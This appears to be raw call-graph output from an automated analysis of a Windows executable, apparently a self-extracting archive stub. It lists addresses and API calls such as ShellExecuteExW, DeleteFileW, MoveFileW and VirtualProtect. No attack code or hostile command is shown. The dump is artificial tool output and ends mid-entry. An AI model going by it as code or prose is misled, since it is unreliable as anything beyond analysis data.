17a9c6 24371->24372 24373 17ab50 24371->24373 24378 178e06 __vswprintf_c_l 21 API calls 24372->24378 24380 17a9e7 __vsnwprintf_l 24372->24380 24374 16fbbc CatchGuardHandler 5 API calls 24373->24374 24375 17ab63 24374->24375 24375->24347 24376 17aa30 MultiByteToWideChar 24377 17aa9c 24376->24377 24379 17aa49 24376->24379 24405 17abc3 20 API calls _free 24377->24405 24378->24380 24396 17af6c 24379->24396 24380->24376 24380->24377 24384 17aa73 24384->24377 24387 17af6c __vswprintf_c_l 11 API calls 24384->24387 24385 17aaab 24386 178e06 __vswprintf_c_l 21 API calls 24385->24386 24390 17aacc __vsnwprintf_l 24385->24390 24386->24390 24387->24377 24388 17ab41 24404 17abc3 20 API calls _free 24388->24404 24390->24388 24391 17af6c __vswprintf_c_l 11 API calls 24390->24391 24392 17ab20 24391->24392 24392->24388 24393 17ab2f WideCharToMultiByte 24392->24393 24393->24388 24394 17ab6f 24393->24394 24406 17abc3 20 API calls _free 24394->24406 24397 17ac98 _abort 5 API calls 24396->24397 24398 17af93 24397->24398 24401 17af9c 24398->24401 24407 17aff4 10 API calls 3 library calls 24398->24407 24400 17afdc LCMapStringW 24400->24401 24402 16fbbc CatchGuardHandler 5 API calls 24401->24402 24403 17aa60 24402->24403 24403->24377 24403->24384 24403->24385 24404->24377 24405->24373 24406->24377 24407->24400 25449 17c030 GetProcessHeap 25450 151025 29 API calls 25451 17f421 21 API calls __vswprintf_c_l 25452 16c220 93 API calls _swprintf 25454 16e455 14 API calls ___delayLoadHelper2@8 24451 17c051 31 API calls CatchGuardHandler 24456 16cd58 24457 16ce22 24456->24457 24463 16cd7b 24456->24463 24472 16c793 _wcslen _wcsrchr 24457->24472 24484 16d78f 24457->24484 24460 16d40a 24462 161fbb CompareStringW 24462->24463 24463->24457 24463->24462 24464 16ca67 SetWindowTextW 24464->24472 24469 16c855 SetFileAttributesW 24470 16c90f GetFileAttributesW 24469->24470 24482 16c86f __cftof _wcslen 24469->24482 24470->24472 24473 16c921 DeleteFileW 24470->24473 24472->24460 24472->24464 24472->24469 24475 16cc31 GetDlgItem SetWindowTextW SendMessageW 24472->24475 24478 16cc71 SendMessageW 24472->24478 24483 161fbb CompareStringW 24472->24483 24508 16b314 24472->24508 24512 16a64d GetCurrentDirectoryW 24472->24512 24514 15a5d1 6 API calls 24472->24514 24515 15a55a FindClose 24472->24515 24516 16b48e 76 API calls 2 library calls 24472->24516 24517 173e3e 24472->24517 24473->24472 24476 16c932 24473->24476 24475->24472 24477 154092 _swprintf 51 API calls 24476->24477 24479 16c952 GetFileAttributesW 24477->24479 24478->24472 24479->24476 24480 16c967 MoveFileW 24479->24480 24480->24472 24481 16c97f MoveFileExW 24480->24481 24481->24472 24482->24470 24482->24472 24513 15b991 51 API calls 2 library calls 24482->24513 24483->24472 24488 16d799 __cftof _wcslen 24484->24488 24485 16d9e7 24485->24472 24486 16d9c0 24486->24485 24492 16d9de ShowWindow 24486->24492 24487 16d8a5 24530 15a231 24487->24530 24488->24485 24488->24486 24488->24487 24533 161fbb CompareStringW 24488->24533 24492->24485 24493 16d8d9 ShellExecuteExW 24493->24485 24500 16d8ec 24493->24500 24495 16d8d1 24495->24493 24496 16d925 24535 16dc3b 6 API calls 24496->24535 24497 16d97b CloseHandle 24498 16d994 24497->24498 24499 16d989 24497->24499 24498->24486 24536 161fbb CompareStringW 24499->24536 24500->24496 24500->24497 24503 16d91b ShowWindow 24500->24503 24503->24496 24504 16d93d 24504->24497 24505 16d950 GetExitCodeProcess 24504->24505 24505->24497 24506 16d963 24505->24506 24506->24497 24509 16b31e 24508->24509 24510 16b3f0 ExpandEnvironmentStringsW 24509->24510 24511 16b40d 24509->24511 24510->24511 24511->24472 24512->24472 24513->24482 24514->24472 24515->24472 24516->24472 24518 178e54 24517->24518 24519 178e61 24518->24519 24520 178e6c 24518->24520 24521 178e06 __vswprintf_c_l 21 API calls 24519->24521 24522 178e74 24520->24522 24528 178e7d _abort 24520->24528 24527 178e69 24521->24527 24525 178dcc _free 20 API calls 24522->24525 24523 178ea7 HeapReAlloc 24523->24527 24523->24528 24524 178e82 24545 1791a8 20 API calls _abort 24524->24545 24525->24527 24527->24472 24528->24523 24528->24524 24546 177a5e 7 API calls 2 library calls 24528->24546 24537 15a243 24530->24537 24533->24487 24534 15b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24534->24495 24535->24504 24536->24498 24538 16ec50 24537->24538 24539 15a250 GetFileAttributesW 24538->24539 24540 15a261 24539->24540 24541 15a23a 24539->24541 24542 15bb03 GetCurrentDirectoryW 24540->24542 24541->24493 24541->24534 24543 15a275 24542->24543 24543->24541 24544 15a279 GetFileAttributesW 24543->24544 24544->24541 24545->24527 24546->24528 25457 16a440 GdipCloneImage GdipAlloc 25458 173a40 5 API calls CatchGuardHandler 25505 181f40 CloseHandle 25459 151075 84 API calls 24570 159a74 24573 159a7e 24570->24573 24571 159b9d SetFilePointer 24572 159bb6 GetLastError 24571->24572 24576 159ab1 24571->24576 24572->24576 24573->24571 24575 159b79 24573->24575 24573->24576 24577 15981a 24573->24577 24575->24571 24578 159833 24577->24578 24580 159e80 79 API calls 24578->24580 24579 159865 24579->24575 24580->24579 25460 16a070 10 API calls 25462 16b270 99 API calls 25507 151f72 128 API calls __EH_prolog 24607 159f7a 24608 159f8f 24607->24608 24609 159f88 24607->24609 24610 159f9c GetStdHandle 24608->24610 24612 159fab 24608->24612 24610->24612 24611 15a003 WriteFile 24611->24612 24612->24609 24612->24611 24613 159fd4 WriteFile 24612->24613 24614 159fcf 24612->24614 24616 15a095 24612->24616 24618 156baa 78 API calls 24612->24618 24613->24612 24613->24614 24614->24612 24614->24613 24619 156e98 77 API calls 24616->24619 24618->24612 24619->24609 25509 177f6e 52 API calls 3 library calls 25464 16c793 107 API calls 4 library calls 25465 178268 55 API calls _free 25467 16c793 102 API calls 4 library calls 25511 169580 6 API calls 25513 16b18d 78 API calls 25469 16c793 97 API calls 4 library calls 23526 16f3b2 23527 16f3be __FrameHandler3::FrameUnwindToState 23526->23527 23558 16eed7 23527->23558 23529 16f3c5 23530 16f518 23529->23530 23533 16f3ef 23529->23533 23631 16f838 4 API calls 2 library calls 23530->23631 23532 16f51f 23624 177f58 23532->23624 23544 16f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23533->23544 23569 178aed 23533->23569 23540 16f40e 23543 16f495 23578 178a3e 51 API calls 23543->23578 23549 16f48f 23544->23549 23627 177af4 38 API calls _abort 23544->23627 23546 16f49d 23579 16df1e 23546->23579 23577 16f953 GetStartupInfoW __cftof 23549->23577 23552 16f4b1 23552->23532 23553 16f4b5 23552->23553 23554 16f4be 23553->23554 23629 177efb 28 API calls _abort 23553->23629 23630 16f048 12 API calls ___scrt_uninitialize_crt 23554->23630 23557 16f4c6 23557->23540 23559 16eee0 23558->23559 23633 16f654 IsProcessorFeaturePresent 23559->23633 23561 16eeec 23634 172a5e 23561->23634 23563 16eef1 23564 16eef5 23563->23564 23642 178977 23563->23642 23564->23529 23567 16ef0c 23567->23529 23572 178b04 23569->23572 23570 16fbbc CatchGuardHandler 5 API calls 23571 16f408 23570->23571 23571->23540 23573 178a91 23571->23573 23572->23570 23574 178ac0 23573->23574 23575 16fbbc CatchGuardHandler 5 API calls 23574->23575 23576 178ae9 23575->23576 23576->23544 23577->23543 23578->23546 23780 160863 23579->23780 23583 16df3d 23829 16ac16 23583->23829 23585 16df46 __cftof 23586 16df59 GetCommandLineW 23585->23586 23587 16dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23586->23587 23588 16df68 23586->23588 23844 154092 23587->23844 23833 16c5c4 23588->23833 23594 16df76 OpenFileMappingW 23598 16dfd6 CloseHandle 23594->23598 23599 16df8f MapViewOfFile 23594->23599 23595 16dfe0 23838 16dbde 23595->23838 23598->23587 23600 16dfa0 __InternalCxxFrameHandler 23599->23600 23601 16dfcd UnmapViewOfFile 23599->23601 23606 16dbde 2 API calls 23600->23606 23601->23598 23608 16dfbc 23606->23608 23607 1690b7 8 API calls 23609 16e0aa DialogBoxParamW 23607->23609 23608->23601 23610 16e0e4 23609->23610 23611 16e0f6 Sleep 23610->23611 23612 16e0fd 23610->23612 23611->23612 23614 16e10b 23612->23614 23877 16ae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 23612->23877 23615 16e12a DeleteObject 23614->23615 23616 16e146 23615->23616 23617 16e13f DeleteObject 23615->23617 23618 16e177 23616->23618 23623 16e189 23616->23623 23617->23616 23878 16dc3b 6 API calls 23618->23878 23621 16e17d CloseHandle 23621->23623 23622 16e1c3 23628 16f993 GetModuleHandleW 23622->23628 23874 16ac7c 23623->23874 24163 177cd5 23624->24163 23627->23549 23628->23552 23629->23554 23630->23557 23631->23532 23633->23561 23646 173b07 23634->23646 23638 172a6f 23639 172a7a 23638->23639 23660 173b43 DeleteCriticalSection 23638->23660 23639->23563 23641 172a67 23641->23563 23689 17c05a 23642->23689 23645 172a7d 7 API calls 2 library calls 23645->23564 23647 173b10 23646->23647 23649 173b39 23647->23649 23650 172a63 23647->23650 23661 173d46 23647->23661 23666 173b43 DeleteCriticalSection 23649->23666 23650->23641 23652 172b8c 23650->23652 23682 173c57 23652->23682 23655 172ba1 23655->23638 23657 172baf 23658 172bbc 23657->23658 23688 172bbf 6 API calls ___vcrt_FlsFree 23657->23688 23658->23638 23660->23641 23667 173c0d 23661->23667 23664 173d7e InitializeCriticalSectionAndSpinCount 23665 173d69 23664->23665 23665->23647 23666->23650 23668 173c4f 23667->23668 23669 173c26 23667->23669 23668->23664 23668->23665 23669->23668 23674 173b72 23669->23674 23672 173c3b GetProcAddress 23672->23668 23673 173c49 23672->23673 23673->23668 23680 173b7e ___vcrt_FlsFree 23674->23680 23675 173bf3 23675->23668 23675->23672 23676 173b95 LoadLibraryExW 23677 173bb3 GetLastError 23676->23677 23678 173bfa 23676->23678 23677->23680 23678->23675 23679 173c02 FreeLibrary 23678->23679 23679->23675 23680->23675 23680->23676 23681 173bd5 LoadLibraryExW 23680->23681 23681->23678 23681->23680 23683 173c0d ___vcrt_FlsFree 5 API calls 23682->23683 23684 173c71 23683->23684 23685 173c8a TlsAlloc 23684->23685 23686 172b96 23684->23686 23686->23655 23687 173d08 6 API calls ___vcrt_FlsFree 23686->23687 23687->23657 23688->23655 23690 17c077 23689->23690 23693 17c073 23689->23693 23690->23693 23695 17a6a0 23690->23695 23692 16eefe 23692->23567 23692->23645 23707 16fbbc 23693->23707 23696 17a6ac __FrameHandler3::FrameUnwindToState 23695->23696 23714 17ac31 EnterCriticalSection 23696->23714 23698 17a6b3 23715 17c528 23698->23715 23700 17a6c2 23701 17a6d1 23700->23701 23728 17a529 29 API calls 23700->23728 23730 17a6ed LeaveCriticalSection _abort 23701->23730 23704 17a6cc 23729 17a5df GetStdHandle GetFileType 23704->23729 23705 17a6e2 _abort 23705->23690 23708 16fbc4 23707->23708 23709 16fbc5 IsProcessorFeaturePresent 23707->23709 23708->23692 23711 16fc07 23709->23711 23779 16fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23711->23779 23713 16fcea 23713->23692 23714->23698 23716 17c534 __FrameHandler3::FrameUnwindToState 23715->23716 23717 17c541 23716->23717 23718 17c558 23716->23718 23739 1791a8 20 API calls _abort 23717->23739 23731 17ac31 EnterCriticalSection 23718->23731 23721 17c546 23740 179087 26 API calls _abort 23721->23740 23723 17c550 _abort 23723->23700 23724 17c590 23741 17c5b7 LeaveCriticalSection _abort 23724->23741 23726 17c564 23726->23724 23732 17c479 23726->23732 23728->23704 23729->23701 23730->23705 23731->23726 23742 17b136 23732->23742 23734 17c48b 23738 17c498 23734->23738 23749 17af0a 23734->23749 23736 17c4ea 23736->23726 23756 178dcc 23738->23756 23739->23721 23740->23723 23741->23723 23748 17b143 _abort 23742->23748 23743 17b183 23763 1791a8 20 API calls _abort 23743->23763 23744 17b16e RtlAllocateHeap 23746 17b181 23744->23746 23744->23748 23746->23734 23748->23743 23748->23744 23762 177a5e 7 API calls 2 library calls 23748->23762 23764 17ac98 23749->23764 23752 17af4f InitializeCriticalSectionAndSpinCount 23753 17af3a 23752->23753 23754 16fbbc CatchGuardHandler 5 API calls 23753->23754 23755 17af66 23754->23755 23755->23734 23757 178dd7 RtlFreeHeap 23756->23757 23758 178e00 __dosmaperr 23756->23758 23757->23758 23759 178dec 23757->23759 23758->23736 23778 1791a8 20 API calls _abort 23759->23778 23761 178df2 GetLastError 23761->23758 23762->23748 23763->23746 23765 17acc4 23764->23765 23766 17acc8 23764->23766 23765->23766 23770 17ace8 23765->23770 23771 17ad34 23765->23771 23766->23752 23766->23753 23768 17acf4 GetProcAddress 23769 17ad04 _abort 23768->23769 23769->23766 23770->23766 23770->23768 23772 17ad55 LoadLibraryExW 23771->23772 23773 17ad4a 23771->23773 23774 17ad72 GetLastError 23772->23774 23775 17ad8a 23772->23775 23773->23765 23774->23775 23777 17ad7d LoadLibraryExW 23774->23777 23775->23773 23776 17ada1 FreeLibrary 23775->23776 23776->23773 23777->23775 23778->23761 23779->23713 23879 16ec50 23780->23879 23783 1608e7 23787 160c14 GetModuleFileNameW 23783->23787 23890 1775fb 42 API calls __vsnwprintf_l 23783->23890 23784 160888 GetProcAddress 23785 1608a1 23784->23785 23786 1608b9 GetProcAddress 23784->23786 23785->23786 23788 1608cb 23786->23788 23796 160c32 23787->23796 23788->23783 23790 160b54 23790->23787 23791 160b5f GetModuleFileNameW CreateFileW 23790->23791 23792 160b8f SetFilePointer 23791->23792 23793 160c08 CloseHandle 23791->23793 23792->23793 23794 160b9d ReadFile 23792->23794 23793->23787 23794->23793 23798 160bbb 23794->23798 23799 160c94 GetFileAttributesW 23796->23799 23801 160c5d CompareStringW 23796->23801 23802 160cac 23796->23802 23881 15b146 23796->23881 23884 16081b 23796->23884 23798->23793 23800 16081b 2 API calls 23798->23800 23799->23796 23799->23802 23800->23798 23801->23796 23803 160cb7 23802->23803 23806 160cec 23802->23806 23805 160cd0 GetFileAttributesW 23803->23805 23807 160ce8 23803->23807 23804 160dfb 23828 16a64d GetCurrentDirectoryW 23804->23828 23805->23803 23805->23807 23806->23804 23808 15b146 GetVersionExW 23806->23808 23807->23806 23809 160d06 23808->23809 23810 160d73 23809->23810 23811 160d0d 23809->23811 23812 154092 _swprintf 51 API calls 23810->23812 23813 16081b 2 API calls 23811->23813 23814 160d9b AllocConsole 23812->23814 23815 160d17 23813->23815 23816 160df3 ExitProcess 23814->23816 23817 160da8 GetCurrentProcessId AttachConsole 23814->23817 23818 16081b 2 API calls 23815->23818 23895 173e13 23817->23895 23820 160d21 23818->23820 23891 15e617 23820->23891 23821 160dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 23821->23816 23824 154092 _swprintf 51 API calls 23825 160d4f 23824->23825 23826 15e617 53 API calls 23825->23826 23827 160d5e 23826->23827 23827->23816 23828->23583 23830 16081b 2 API calls 23829->23830 23831 16ac2a OleInitialize 23830->23831 23832 16ac4d GdiplusStartup SHGetMalloc 23831->23832 23832->23585 23837 16c5ce 23833->23837 23834 16c6e4 23834->23594 23834->23595 23835 161fac CharUpperW 23835->23837 23837->23834 23837->23835 23920 15f3fa 82 API calls 2 library calls 23837->23920 23839 16ec50 23838->23839 23840 16dbeb SetEnvironmentVariableW 23839->23840 23842 16dc0e 23840->23842 23841 16dc36 23841->23587 23842->23841 23843 16dc2a SetEnvironmentVariableW 23842->23843 23843->23841 23921 154065 23844->23921 23847 16b6dd LoadBitmapW 23848 16b6fe 23847->23848 23849 16b70b GetObjectW 23847->23849 23989 16a6c2 FindResourceW 23848->23989 23851 16b71a 23849->23851 23984 16a5c6 23851->23984 23855 16b770 23866 15da42 23855->23866 23856 16b74c 24005 16a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23856->24005 23857 16a6c2 13 API calls 23859 16b73d 23857->23859 23859->23856 23861 16b743 DeleteObject 23859->23861 23860 16b754 24006 16a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23860->24006 23861->23856 23863 16b75d 24007 16a80c 8 API calls 23863->24007 23865 16b764 DeleteObject 23865->23855 24018 15da67 23866->24018 23871 1690b7 24151 16eb38 23871->24151 23875 16acab GdiplusShutdown CoUninitialize 23874->23875 23875->23622 23877->23614 23878->23621 23880 16086d GetModuleHandleW 23879->23880 23880->23783 23880->23784 23882 15b196 23881->23882 23883 15b15a GetVersionExW 23881->23883 23882->23796 23883->23882 23885 16ec50 23884->23885 23886 160828 GetSystemDirectoryW 23885->23886 23887 160840 23886->23887 23888 16085e 23886->23888 23889 160851 LoadLibraryW 23887->23889 23888->23796 23889->23888 23890->23790 23892 15e627 23891->23892 23897 15e648 23892->23897 23896 173e1b 23895->23896 23896->23821 23896->23896 23903 15d9b0 23897->23903 23900 15e645 23900->23824 23901 15e66b LoadStringW 23901->23900 23902 15e682 LoadStringW 23901->23902 23902->23900 23908 15d8ec 23903->23908 23905 15d9cd 23906 15d9e2 23905->23906 23916 15d9f0 26 API calls 23905->23916 23906->23900 23906->23901 23909 15d904 23908->23909 23915 15d984 _strncpy 23908->23915 23910 15d928 23909->23910 23917 161da7 WideCharToMultiByte 23909->23917 23912 15d959 23910->23912 23918 15e5b1 50 API calls __vsnprintf 23910->23918 23919 176159 26 API calls 3 library calls 23912->23919 23915->23905 23916->23906 23917->23910 23918->23912 23919->23915 23920->23837 23922 15407c __vsnwprintf_l 23921->23922 23925 175fd4 23922->23925 23928 174097 23925->23928 23929 1740d7 23928->23929 23930 1740bf 23928->23930 23929->23930 23932 1740df 23929->23932 23945 1791a8 20 API calls _abort 23930->23945 23947 174636 23932->23947 23933 1740c4 23946 179087 26 API calls _abort 23933->23946 23937 16fbbc CatchGuardHandler 5 API calls 23939 154086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 23937->23939 23939->23847 23940 174167 23956 1749e6 51 API calls 4 library calls 23940->23956 23942 174172 23957 1746b9 20 API calls _free 23942->23957 23944 1740cf 23944->23937 23945->23933 23946->23944 23948 174653 23947->23948 23949 1740ef 23947->23949 23948->23949 23958 1797e5 GetLastError 23948->23958 23955 174601 20 API calls 2 library calls 23949->23955 23951 174674 23978 17993a 38 API calls __fassign 23951->23978 23953 17468d 23979 179967 38 API calls __fassign 23953->23979 23955->23940 23956->23942 23957->23944 23959 179801 23958->23959 23960 1797fb 23958->23960 23962 17b136 _abort 20 API calls 23959->23962 23964 179850 SetLastError 23959->23964 23980 17ae5b 11 API calls 2 library calls 23960->23980 23963 179813 23962->23963 23965 17981b 23963->23965 23981 17aeb1 11 API calls 2 library calls 23963->23981 23964->23951 23967 178dcc _free 20 API calls 23965->23967 23969 179821 23967->23969 23968 179830 23968->23965 23970 179837 23968->23970 23971 17985c SetLastError 23969->23971 23982 179649 20 API calls _abort 23970->23982 23983 178d24 38 API calls _abort 23971->23983 23974 179842 23975 178dcc _free 20 API calls 23974->23975 23977 179849 23975->23977 23977->23964 23977->23971 23978->23953 23979->23949 23980->23959 23981->23968 23982->23974 24008 16a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23984->24008 23986 16a5cd 23987 16a5d9 23986->23987 24009 16a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23986->24009 23987->23855 23987->23856 23987->23857 23990 16a6e5 SizeofResource 23989->23990 23992 16a7d3 23989->23992 23991 16a6fc LoadResource 23990->23991 23990->23992 23991->23992 23993 16a711 LockResource 23991->23993 23992->23849 23992->23851 23993->23992 23994 16a722 GlobalAlloc 23993->23994 23994->23992 23995 16a73d GlobalLock 23994->23995 23996 16a7cc GlobalFree 23995->23996 23997 16a74c __InternalCxxFrameHandler 23995->23997 23996->23992 23998 16a754 CreateStreamOnHGlobal 23997->23998 23999 16a7c5 GlobalUnlock 23998->23999 24000 16a76c 23998->24000 23999->23996 24010 16a626 GdipAlloc 24000->24010 24003 16a7b0 24003->23999 24004 16a79a GdipCreateHBITMAPFromBitmap 24004->24003 24005->23860 24006->23863 24007->23865 24008->23986 24009->23987 24011 16a645 24010->24011 24012 16a638 24010->24012 24011->23999 24011->24003 24011->24004 24014 16a3b9 24012->24014 24015 16a3e1 GdipCreateBitmapFromStream 24014->24015 24016 16a3da GdipCreateBitmapFromStreamICM 24014->24016 24017 16a3e6 24015->24017 24016->24017 24017->24011 24019 15da75 __EH_prolog 24018->24019 24020 15daa4 GetModuleFileNameW 24019->24020 24021 15dad5 24019->24021 24022 15dabe 24020->24022 24064 1598e0 24021->24064 24022->24021 24024 15db31 24075 176310 24024->24075 24026 15e261 78 API calls 24030 15db05 24026->24030 24029 15db44 24031 176310 26 API calls 24029->24031 24030->24024 24030->24026 24043 15dd4a 24030->24043 24039 15db56 ___vcrt_FlsFree 24031->24039 24032 15dc85 24032->24043 24111 159d70 81 API calls 24032->24111 24036 15dc9f ___std_exception_copy 24037 159bd0 82 API calls 24036->24037 24036->24043 24040 15dcc8 ___std_exception_copy 24037->24040 24039->24032 24039->24043 24089 159e80 24039->24089 24105 159bd0 24039->24105 24110 159d70 81 API calls 24039->24110 24042 15dcd3 _wcslen ___std_exception_copy ___vcrt_FlsFree 24040->24042 24040->24043 24112 161b84 MultiByteToWideChar 24040->24112 24042->24043 24044 15e159 24042->24044 24059 161da7 WideCharToMultiByte 24042->24059 24113 15e5b1 50 API calls __vsnprintf 24042->24113 24114 176159 26 API calls 3 library calls 24042->24114 24115 178cce 26 API calls 2 library calls 24042->24115 24116 177625 26 API calls 2 library calls 24042->24116 24117 15e27c 78 API calls 24042->24117 24098 15959a 24043->24098 24054 15e1de 24044->24054 24118 178cce 26 API calls 2 library calls 24044->24118 24048 15e1c6 24120 15e27c 78 API calls 24048->24120 24049 15e214 24052 176310 26 API calls 24049->24052 24051 15e261 78 API calls 24051->24054 24055 15e22d 24052->24055 24053 15e16e 24119 177625 26 API calls 2 library calls 24053->24119 24054->24049 24054->24051 24056 176310 26 API calls 24055->24056 24056->24043 24059->24042 24062 15e29e GetModuleHandleW FindResourceW 24063 15da55 24062->24063 24063->23871 24065 1598ea 24064->24065 24066 15994b CreateFileW 24065->24066 24067 15996c GetLastError 24066->24067 24070 1599bb 24066->24070 24121 15bb03 24067->24121 24069 15998c 24069->24070 24072 159990 CreateFileW GetLastError 24069->24072 24071 1599ff 24070->24071 24073 1599e5 SetFileTime 24070->24073 24071->24030 24072->24070 24074 1599b5 24072->24074 24073->24071 24074->24070 24076 176349 24075->24076 24077 17634d 24076->24077 24088 176375 24076->24088 24125 1791a8 20 API calls _abort 24077->24125 24079 176352 24126 179087 26 API calls _abort 24079->24126 24080 176699 24082 16fbbc CatchGuardHandler 5 API calls 24080->24082 24084 1766a6 24082->24084 24083 17635d 24085 16fbbc CatchGuardHandler 5 API calls 24083->24085 24084->24029 24087 176369 24085->24087 24087->24029 24088->24080 24127 176230 5 API calls CatchGuardHandler 24088->24127 24090 159e92 24089->24090 24091 159ea5 24089->24091 24092 159eb0 24090->24092 24128 156d5b 77 API calls 24090->24128 24091->24092 24094 159eb8 SetFilePointer 24091->24094 24092->24039 24094->24092 24095 159ed4 GetLastError 24094->24095 24095->24092 24096 159ede 24095->24096 24096->24092 24129 156d5b 77 API calls 24096->24129 24099 1595cf 24098->24099 24100 1595be 24098->24100 24099->24062 24100->24099 24101 1595d1 24100->24101 24102 1595ca 24100->24102 24135 159620 24101->24135 24130 15974e 24102->24130 24106 159bdc 24105->24106 24109 159be3 24105->24109 24106->24039 24108 159785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 24108->24109 24109->24106 24109->24108 24150 156d1a 77 API calls 24109->24150 24110->24039 24111->24036 24112->24042 24113->24042 24114->24042 24115->24042 24116->24042 24117->24042 24118->24053 24119->24048 24120->24054 24122 15bb10 _wcslen 24121->24122 24123 15bbb8 GetCurrentDirectoryW 24122->24123 24124 15bb39 _wcslen 24122->24124 24123->24124 24124->24069 24125->24079 24126->24083 24127->24088 24128->24091 24129->24092 24131 159781 24130->24131 24132 159757 24130->24132 24131->24099 24132->24131 24141 15a1e0 24132->24141 24136 15962c 24135->24136 24139 15964a 24135->24139 24138 159638 CloseHandle 24136->24138 24136->24139 24137 159669 24137->24099 24138->24139 24139->24137 24149 156bd5 76 API calls 24139->24149 24142 16ec50 24141->24142 24143 15a1ed DeleteFileW 24142->24143 24144 15a200 24143->24144 24145 15977f 24143->24145 24146 15bb03 GetCurrentDirectoryW 24144->24146 24145->24099 24147 15a214 24146->24147 24147->24145 24148 15a218 DeleteFileW 24147->24148 24148->24145 24149->24137 24150->24109 24153 16eb3d ___std_exception_copy 24151->24153 24152 1690d6 24152->23607 24153->24152 24156 16eb59 24153->24156 24160 177a5e 7 API calls 2 library calls 24153->24160 24155 16f5c9 24162 17238d RaiseException 24155->24162 24156->24155 24161 17238d RaiseException 24156->24161 24159 16f5e6 24160->24153 24161->24155 24162->24159 24164 177ce1 _abort 24163->24164 24165 177cfa 24164->24165 24166 177ce8 24164->24166 24187 17ac31 EnterCriticalSection 24165->24187 24199 177e2f GetModuleHandleW 24166->24199 24169 177ced 24169->24165 24200 177e73 GetModuleHandleExW 24169->24200 24170 177d01 24178 177d76 24170->24178 24186 177d9f 24170->24186 24208 1787e0 20 API calls _abort 24170->24208 24175 177dbc 24191 177dee 24175->24191 24176 177de8 24209 182390 5 API calls CatchGuardHandler 24176->24209 24177 177d8e 24183 178a91 _abort 5 API calls 24177->24183 24178->24177 24182 178a91 _abort 5 API calls 24178->24182 24182->24177 24183->24186 24188 177ddf 24186->24188 24187->24170 24210 17ac81 LeaveCriticalSection 24188->24210 24190 177db8 24190->24175 24190->24176 24211 17b076 24191->24211 24194 177e1c 24197 177e73 _abort 8 API calls 24194->24197 24195 177dfc GetPEB 24195->24194 24196 177e0c GetCurrentProcess TerminateProcess 24195->24196 24196->24194 24198 177e24 ExitProcess 24197->24198 24199->24169 24201 177ec0 24200->24201 24202 177e9d GetProcAddress 24200->24202 24204 177ec6 FreeLibrary 24201->24204 24205 177ecf 24201->24205 24203 177eb2 24202->24203 24203->24201 24204->24205 24206 16fbbc CatchGuardHandler 5 API calls 24205->24206 24207 177cf9 24206->24207 24207->24165 24208->24178 24210->24190 24212 17b09b 24211->24212 24216 17b091 24211->24216 24213 17ac98 _abort 5 API calls 24212->24213 24213->24216 24214 16fbbc CatchGuardHandler 5 API calls 24215 177df8 24214->24215 24215->24194 24215->24195 24216->24214 25515 16b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 24217 16e5b1 24219 16e578 24217->24219 24220 16e85d 24219->24220 24246 16e5bb 24220->24246 24222 16e86d 24223 16e8ee 24222->24223 24224 16e8ca 24222->24224 24227 16e966 LoadLibraryExA 24223->24227 24228 16e9c7 24223->24228 24230 16e9d9 24223->24230 24242 16ea95 24223->24242 24225 16e7fb DloadReleaseSectionWriteAccess 6 API calls 24224->24225 24226 16e8d5 RaiseException 24225->24226 24240 16eac3 24226->24240 24227->24228 24229 16e979 GetLastError 24227->24229 24228->24230 24234 16e9d2 FreeLibrary 24228->24234 24231 16e9a2 24229->24231 24232 16e98c 24229->24232 24233 16ea37 GetProcAddress 24230->24233 24230->24242 24235 16e7fb DloadReleaseSectionWriteAccess 6 API calls 24231->24235 24232->24228 24232->24231 24236 16ea47 GetLastError 24233->24236 24233->24242 24234->24230 24237 16e9ad RaiseException 24235->24237 24238 16ea5a 24236->24238 24237->24240 24241 16e7fb DloadReleaseSectionWriteAccess 6 API calls 24238->24241 24238->24242 24240->24219 24243 16ea7b RaiseException 24241->24243 24255 16e7fb 24242->24255 24244 16e5bb ___delayLoadHelper2@8 6 API calls 24243->24244 24245 16ea92 24244->24245 24245->24242 24247 16e5c7 24246->24247 24248 16e5ed 24246->24248 24263 16e664 24247->24263 24248->24222 24250 16e5cc 24251 16e5e8 24250->24251 24266 16e78d 24250->24266 24271 16e5ee GetModuleHandleW GetProcAddress GetProcAddress 24251->24271 24254 16e836 24254->24222 24256 16e82f 24255->24256 24257 16e80d 24255->24257 24256->24240 24258 16e664 DloadReleaseSectionWriteAccess 3 API calls 24257->24258 24259 16e812 24258->24259 24260 16e82a 24259->24260 24261 16e78d DloadProtectSection 3 API calls 24259->24261 24274 16e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24260->24274 24261->24260 24272 16e5ee GetModuleHandleW GetProcAddress GetProcAddress 24263->24272 24265 16e669 24265->24250 24268 16e7a2 DloadProtectSection 24266->24268 24267 16e7a8 24267->24251 24268->24267 24269 16e7dd VirtualProtect 24268->24269 24273 16e6a3 VirtualQuery GetSystemInfo 24268->24273 24269->24267 24271->24254 24272->24265 24273->24269 24274->24256 25517 161bbd GetCPInfo IsDBCSLeadByte 25518 17b1b8 27 API calls 3 library calls 25519 16eda7 48 API calls _unexpected 25520 16f3a0 27 API calls 25473 17a4a0 71 API calls _free 25474 16dca1 DialogBoxParamW 25475 1808a0 IsProcessorFeaturePresent 25522 156faa 111 API calls 3 library calls 24418 1510d5 24423 155abd 24418->24423 24424 155ac7 __EH_prolog 24423->24424 24430 15b505 24424->24430 24426 155ad3 24436 155cac GetCurrentProcess GetProcessAffinityMask 24426->24436 24431 15b50f __EH_prolog 24430->24431 24437 15f1d0 82 API calls 24431->24437 24433 15b521 24438 15b61e 24433->24438 24437->24433 24439 15b630 __cftof 24438->24439 24442 1610dc 24439->24442 24445 16109e GetCurrentProcess GetProcessAffinityMask 24442->24445 24446 15b597 24445->24446 24446->24426 24447 16e2d7 24448 16e1db 24447->24448 24449 16e85d ___delayLoadHelper2@8 14 API calls 24448->24449 24449->24448 25476 16f4d3 20 API calls 24453 16e1d1 14 API calls ___delayLoadHelper2@8 25524 17a3d0 21 